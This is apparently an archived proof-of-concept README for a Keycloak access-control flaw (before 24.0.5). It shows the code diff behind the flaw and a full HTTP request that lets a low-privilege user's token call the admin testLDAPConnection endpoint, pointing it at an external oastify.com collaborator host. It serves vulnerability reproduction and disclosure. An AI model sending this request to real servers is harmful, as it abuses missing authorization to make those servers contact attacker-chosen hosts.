关联漏洞
描述
Keycloak admin API allows low privilege users to use administrative functions
介绍
Keycloak < 24.0.5 is vulnerable to Broken Access Control vulnerability, where the attacker can use any authenticated user to perform some api action such as :
Test LDAP connections via the **testLDAPConnection** endpoint.
Retrieve unmanaged attributes of any user via the **getUnmanagedAttributes** endpoint.
Access client registration policy providers via the **getProviders** endpoint.
I only found testLDAPConnection interesting where an attacker can interact with LDAP to an external host .
steps of reproduction
===================
first download the vulnerable version of KeyCloak 24.0.4 from here https://www.keycloak.org/archive/downloads-24.0.4.html
then extract the Zip file and run the command `bin/kc.sh start-dev`
Now You will run it on localhost:8080, Create a new admin account then login to this admin account
now create a New Realm for regular users, then create a user with user privilege in this realm
Based on the commit that fix the vulnerability "Missing auth checks in some admin endpoints" https://github.com/keycloak/keycloak/commit/d9f0c84b797525eac55914db5f81a8133ef5f9b1
we find that there are 3 files that have been modified :
TestLdapConnectionResource.java
UserResource.java
ClientRegistrationPolicyResource.java
Analyzing the Code Change in TestLdapConnectionResource.java:
**(Vulnerable Code):**
```java
public Response testLDAPConnection(TestLdapConnectionRepresentation config) {
try {
LDAPServerCapabilitiesManager.testLDAP(config, session, realm);
return Response.noContent().build();
}
// Exception handling...
}
```
There was **no permission check**. Any authenticated user could call `testLDAPConnection` and perform LDAP tests, which is an administrative action.
**(Patched Code):**
```java
public Response testLDAPConnection(TestLdapConnectionRepresentation config) {
auth.realm().requireManageRealm(); // Added permission check
try {
LDAPServerCapabilitiesManager.testLDAP(config, session, realm);
return Response.noContent().build();
}
// Exception handling...
}
```
The line `auth.realm().requireManageRealm();` was added to check if the user has admin permissions (`manage_realm` role) in the realm.
This means any user with any Realm can send a requset to `/admin/realms/users/testLDAPConnection`
Now in a new browser Open the link http://localhost:8080/realms/users/protocol/openid-connect/auth?client_id=account-console
Log in with the user that you created, then grep the **authorization: Bearer <>**
send HTTP requset to the vulnerable endpoint :
```http
POST /admin/realms/users/testLDAPConnection HTTP/1.1
Host: dzdz.me:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
authorization: Bearer <xxxx>
content-type: application/json
Content-Length: 265
Origin: http://dzdz.me:8080
Connection: close
{
"action": "testConnection",
"connectionUrl": "ldap://xxxxxxxxxxxxxxxxxxxxxxx.oastify.com",
"bindDn": "cn=admin,dc=example,dc=com",
"bindCredential": "password",
"useTruststoreSpi": "ldapsOnly",
"connectionTimeout": "5000"
}
```
in the parameter `connectionUrl` put Your external host and send the Requset,
then You will receive the DNS interaction
you can apply the same thing with getUnmanagedAttributes and getProviders.
reference:
https://github.com/keycloak/keycloak/commit/d9f0c84b797525eac55914db5f81a8133ef5f9b1
https://github.com/advisories/GHSA-2cww-fgmg-4jqc
文件快照
[4.0K] /data/pocs/2dec897b271b2ceab5341cd29b682391b8f58be7
└── [3.9K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。